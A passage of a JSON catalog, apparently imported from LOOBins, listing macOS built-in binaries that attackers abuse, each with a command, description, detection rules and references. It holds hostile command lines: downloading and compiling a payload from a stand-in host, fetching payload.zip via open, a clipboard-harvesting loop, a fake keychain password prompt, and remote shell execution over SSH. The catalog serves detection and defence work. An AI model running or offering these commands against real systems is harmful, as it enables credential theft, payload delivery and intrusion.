processes"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml","https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/","https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html","https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:notifyutil:c44dbcefe0e67951","toolId":"loobins:notifyutil","toolName":"notifyutil","name":"Monitor login/logout events for privilege escalation timing","source":"LOOBins","platform":["macOS"],"capability":["Discovery","Privilege Escalation"],"nativeCategory":["Discovery","Privilege Escalation"],"command":"notifyutil -w com.apple.loginwindow.logout -w com.apple.springboard.attemptactivationend","description":"By monitoring authentication-related notification keys, an attacker can detect login and logout events to time privilege escalation attempts or other malicious activities when defenses may be weakened during authentication transitions.","mitre":[],"fullPath":["/usr/bin/notifyutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Monitor notifyutil execution with suspicious notification keys","value":"Monitor notifyutil execution with suspicious notification keys"},{"type":"Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)","value":"Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)"},{"type":"Monitor long-running notifyutil processes (using -w flag for sustained monitoring)","value":"Monitor long-running notifyutil processes (using -w flag for sustained monitoring)"},{"type":"Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes","value":"Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml","https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/","https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html","https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:notifyutil:1b0af23ae08ae744","toolId":"loobins:notifyutil","toolName":"notifyutil","name":"Query system notification state values for reconnaissance","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"notifyutil -g com.apple.system.timezone\nnotifyutil -g com.apple.loginwindow.logout\nnotifyutil -g com.apple.screenIsLocked","description":"Threat actors can query state values of system notification keys to gather information about the current system configuration without executing more suspicious commands.","mitre":[],"fullPath":["/usr/bin/notifyutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Monitor notifyutil execution with suspicious notification keys","value":"Monitor notifyutil execution with suspicious notification keys"},{"type":"Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)","value":"Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)"},{"type":"Monitor long-running notifyutil processes (using -w flag for sustained monitoring)","value":"Monitor long-running notifyutil processes (using -w flag for sustained monitoring)"},{"type":"Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes","value":"Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml","https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/","https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html","https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:nscurl:5b4e238d88fa7cf3","toolId":"loobins:nscurl","toolName":"nscurl","name":"Download file","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion","Command and Control"],"command":"nscurl -k https://google.com -o /private/tmp/google","description":"Download file and ignore cert checking","mitre":[],"fullPath":["/usr/bin/nscurl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect all curl and nscurl activity","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/all_curl_activity"},{"type":"Jamf Protect: Detect file downloads using the insecure argument for curl and nscurl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/file_download_curl_insecure"},{"type":"Sigma: File Download Via Nscurl - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nscurl.yml","https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl","https://danielcortez.substack.com/p/living-off-the-land-exploring-macos"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:nscurl:ee54398ef9eb9eff","toolId":"loobins:nscurl","toolName":"nscurl","name":"Download file","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion","Command and Control"],"command":"nscurl https://google.com -dl","description":"Download file to the Downloads directory using -dl","mitre":[],"fullPath":["/usr/bin/nscurl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect all curl and nscurl activity","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/all_curl_activity"},{"type":"Jamf Protect: Detect file downloads using the insecure argument for curl and nscurl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/file_download_curl_insecure"},{"type":"Sigma: File Download Via Nscurl - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nscurl.yml","https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl","https://danielcortez.substack.com/p/living-off-the-land-exploring-macos"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:nscurl:5e3b292edcfd8e16","toolId":"loobins:nscurl","toolName":"nscurl","name":"Download file","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion","Command and Control"],"command":"nscurl https://google.com -dir /private/tmp/google","description":"Download file to a designated directory using -dir","mitre":[],"fullPath":["/usr/bin/nscurl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect all curl and nscurl activity","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/all_curl_activity"},{"type":"Jamf Protect: Detect file downloads using the insecure argument for curl and nscurl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/file_download_curl_insecure"},{"type":"Sigma: File Download Via Nscurl - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nscurl.yml","https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl","https://danielcortez.substack.com/p/living-off-the-land-exploring-macos"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:nvram:0d1e2b7144728348","toolId":"loobins:nvram","toolName":"nvram","name":"Get nvram variables","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"nvram -p","description":"The -p option prints all the nvram variables that contain some potentially sensitive information like WiFi SSIDs and Bluetooth devices.","mitre":[],"fullPath":["/usr/sbin/nvram"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing.","value":"No detections at time of publishing."}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nvram.yml","https://ss64.com/osx/nvram.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:odutil:1a80777abd38d15d","toolId":"loobins:odutil","toolName":"odutil","name":"Listing the available node names","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"odutil show nodenames","description":"List all available node names","mitre":[],"fullPath":["/usr/bin/odutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/odutil.yml","https://macosbin.com/bin/odutil","https://www.unix.com/man-page/osx/1/odutil/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:odutil:c97f832e924791c8","toolId":"loobins:odutil","toolName":"odutil","name":"Retrieves active session","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"odutil show sessions","description":"Retrieves all active sessions","mitre":[],"fullPath":["/usr/bin/odutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/odutil.yml","https://macosbin.com/bin/odutil","https://www.unix.com/man-page/osx/1/odutil/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:odutil:27e596cc427f4d65","toolId":"loobins:odutil","toolName":"odutil","name":"Retrieves \"Default search policy\"","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"odutil show configuration /Search","description":"Retrieves the configuration of \"Default search policy\"","mitre":[],"fullPath":["/usr/bin/odutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/odutil.yml","https://macosbin.com/bin/odutil","https://www.unix.com/man-page/osx/1/odutil/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:odutil:076a878e325ba974","toolId":"loobins:odutil","toolName":"odutil","name":"Retrieves \"Contact search policy\"","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"odutil show configuration /Contacts","description":"Retrieves the configuration of \"Contact search policy\"","mitre":[],"fullPath":["/usr/bin/odutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/odutil.yml","https://macosbin.com/bin/odutil","https://www.unix.com/man-page/osx/1/odutil/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:open:9d6e5bf92253e8b1","toolId":"loobins:open","toolName":"open","name":"Open a malicious file","source":"LOOBins","platform":["macOS"],"capability":["Execution"],"nativeCategory":["Execution"],"command":"open Malicious.app","description":"The open command can be used to open a malicious macOS app from the terminal.","mitre":[],"fullPath":["/usr/bin/open"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/open.yml","https://scriptingosx.com/2017/02/the-macos-open-command/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:open:baa2cd4b26d3da10","toolId":"loobins:open","toolName":"open","name":"Download a malicious file","source":"LOOBins","platform":["macOS"],"capability":["Execution"],"nativeCategory":["Execution"],"command":"open -g https://mypayload.io/payload.zip; sleep 3; killall Safari","description":"The following command downloads the payload.zip file in the default browser (Safari) and then kills it.","mitre":[],"fullPath":["/usr/bin/open"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/open.yml","https://scriptingosx.com/2017/02/the-macos-open-command/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:osacompile:62c7b7fda3724111","toolId":"loobins:osacompile","toolName":"osacompile","name":"Download and compile a payload","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Command and Control","Resource Development"],"command":"curl https://getpayload.com/payload_code.apple_script && osacompile -x -e payload_code.apple_script -o payload.app","description":"The following command downloads an applescript payload from getpayload.com and compiles it into an app.","mitre":[],"fullPath":["/usr/bin/osacompile"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: In-Memory Download And Compile Of Payloads (experimental/pending)","value":"https://github.com/SigmaHQ/sigma/pull/4127/commits/f4b0264a83e5f47473029e26dc0879fb196a7d07"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osacompile.yml","https://redcanary.com/blog/mac-application-bundles/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:osascript:eb192e839a2c73e1","toolId":"loobins:osascript","toolName":"osascript","name":"Use the osascript binary to gather sensitive clipboard data","source":"LOOBins","platform":["macOS"],"capability":["Collection","Credential Access"],"nativeCategory":["Collection","Credential Access"],"command":"while true; do echo $(osascript -e 'return (the clipboard)') >> clipdata.txt; sleep 10; done","description":"A bash loop can gather clipboard contents over a defined time period. The following command calls /usr/bin/osascript -e 'return (the clipboard)' indefinitely every 10 seconds and writes clipboard content to a text file.","mitre":[],"fullPath":["/usr/bin/osascript"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)","value":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)"},{"type":"Jamf Protect: Detect activity that is related to osascript gathering clipboard content","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml"},{"type":"Jamf Protect: Detect activity that is related to osascript pulling system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml"},{"type":"Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml"},{"type":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)","value":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)"},{"type":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications","value":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml","https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:osascript:e7145a781a0f1138","toolId":"loobins:osascript","toolName":"osascript","name":"Use the osascript binary to gather system information","source":"LOOBins","platform":["macOS"],"capability":["Collection","Discovery"],"nativeCategory":["Collection","Discovery"],"command":"osascript -e 'return (system info)'","description":"osascript can be used to gather the operating system version, current username, user ID, computer name, IP address, and other information.","mitre":[],"fullPath":["/usr/bin/osascript"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)","value":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)"},{"type":"Jamf Protect: Detect activity that is related to osascript gathering clipboard content","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml"},{"type":"Jamf Protect: Detect activity that is related to osascript pulling system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml"},{"type":"Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml"},{"type":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)","value":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)"},{"type":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications","value":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml","https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:osascript:d587958586ecaf12","toolId":"loobins:osascript","toolName":"osascript","name":"Use the osascript binary to prompt the user for credentials","source":"LOOBins","platform":["macOS"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"osascript -e 'set popup to display dialog \"Keychain Access wants to use the login keychain\" & return & return & \"Please enter the keychain password\" & return default answer \"\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:FileVaultIcon.icns\" with title \"Authentication Needed\" with hidden answer'","description":"osascript can be used to generate a dialogue box and request the user to enter the keychain password.","mitre":[],"fullPath":["/usr/bin/osascript"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)","value":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)"},{"type":"Jamf Protect: Detect activity that is related to osascript gathering clipboard content","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml"},{"type":"Jamf Protect: Detect activity that is related to osascript pulling system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml"},{"type":"Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml"},{"type":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)","value":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)"},{"type":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications","value":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml","https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:osascript:eee928fec29a8165","toolId":"loobins:osascript","toolName":"osascript","name":"Use the osascript binary to execute a JXA (JavaScript for Automation) file.","source":"LOOBins","platform":["macOS"],"capability":["Execution"],"nativeCategory":["Execution"],"command":"echo \"ObjC.import('Cocoa');\\nObjC.import('stdlib');\\nvar currentApp = Application.currentApplication();\\ncurrentApp.includeStandardAdditions = true;\\ncurrentApp.doShellScript('open -a Calculator.app');\" > calc.js && osascript -l JavaScript calc.js","description":"JXA is often used by red teams (and potentially attackers) as a macOS payload, as JXA is native to macOS and can access various internal macOS APIs (such as Cocoa, Foundation, OSAKit, etc.). The osascript binary can be used to execute JXA payloads by simply running \"osascript [file.js]\" but some malware or offensive tools may also use \"osascript -l JavaScript [file.js]\".","mitre":[],"fullPath":["/usr/bin/osascript"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)","value":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)"},{"type":"Jamf Protect: Detect activity that is related to osascript gathering clipboard content","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml"},{"type":"Jamf Protect: Detect activity that is related to osascript pulling system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml"},{"type":"Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml"},{"type":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)","value":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)"},{"type":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications","value":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml","https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:osascript:f761e47f7cf28e2e","toolId":"loobins:osascript","toolName":"osascript","name":"Execute shell commands via osascript do shell script","source":"LOOBins","platform":["macOS"],"capability":["Execution","Defense Evasion","Privilege Escalation"],"nativeCategory":["Execution","Defense Evasion","Privilege Escalation"],"command":"osascript -e 'do shell script \"id\"'","description":"osascript's 'do shell script' handler executes arbitrary shell commands through the AppleScript runtime. Commands spawned this way are children of osascript rather than the calling shell, which can bypass detection logic tied to specific parent-child process relationships. The 'with administrator privileges' flag triggers a native macOS authentication prompt and runs the command as root if the user authenticates, without requiring sudo.","mitre":[],"fullPath":["/usr/bin/osascript"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)","value":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)"},{"type":"Jamf Protect: Detect activity that is related to osascript gathering clipboard content","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml"},{"type":"Jamf Protect: Detect activity that is related to osascript pulling system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml"},{"type":"Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml"},{"type":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)","value":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)"},{"type":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications","value":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml","https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:osascript:a48177c8d82f5af7","toolId":"loobins:osascript","toolName":"osascript","name":"Remote command execution over SSH using osascript do shell script","source":"LOOBins","platform":["macOS"],"capability":["Lateral Movement","Execution"],"nativeCategory":["Lateral Movement","Execution"],"command":"ssh -i key.pem user@<TARGET_IP> 'bash -s' <<'EOF'\nosascript -e 'do shell script \"id\"'\nEOF","description":"osascript's 'do shell script' handler can be invoked over an SSH session to execute arbitrary shell commands on a remote macOS host. This technique requires only SSH access to the target. Unlike when using Remote Apple Events (eppc://) with osascript, it does not require port 3031 to be accessible, Remote Apple Events to be enabled, or the target application to be running. This makes it viable against hosts where eppc:// is blocked by the firewall or disabled in System Settings, and against headless or server Macs that have no active GUI session.","mitre":[],"fullPath":["/usr/bin/osascript"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)","value":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)"},{"type":"Jamf Protect: Detect activity that is related to osascript gathering clipboard content","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml"},{"type":"Jamf Protect: Detect activity that is related to osascript pulling system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml"},{"type":"Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml"},{"type":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)","value":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)"},{"type":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications","value":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml","https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:osascript:1b57fc0621ffd467","toolId":"loobins:osascript","toolName":"osascript","name":"Mount SMB volume without GUI using osascript mount volume","source":"LOOBins","platform":["macOS"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement"],"command":"osascript -e 'mount volume \"smb://user:<PASSWORD>@<TARGET_IP>/share\"'","description":"osascript can mount an SMB share on the local machine using the 'mount volume' command. This approach bypasses the macOS GUI requirement for enabling Windows File Sharing password storage on the target, which is required when using the mount command directly. The share is mounted to /Volumes/<sharename> and its contents are immediately accessible as local files.","mitre":[],"fullPath":["/usr/bin/osascript"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)","value":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)"},{"type":"Jamf Protect: Detect activity that is related to osascript gathering clipboard content","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml"},{"type":"Jamf Protect: Detect activity that is related to osascript pulling system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml"},{"type":"Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml"},{"type":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)","value":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)"},{"type":"Command Line Argument 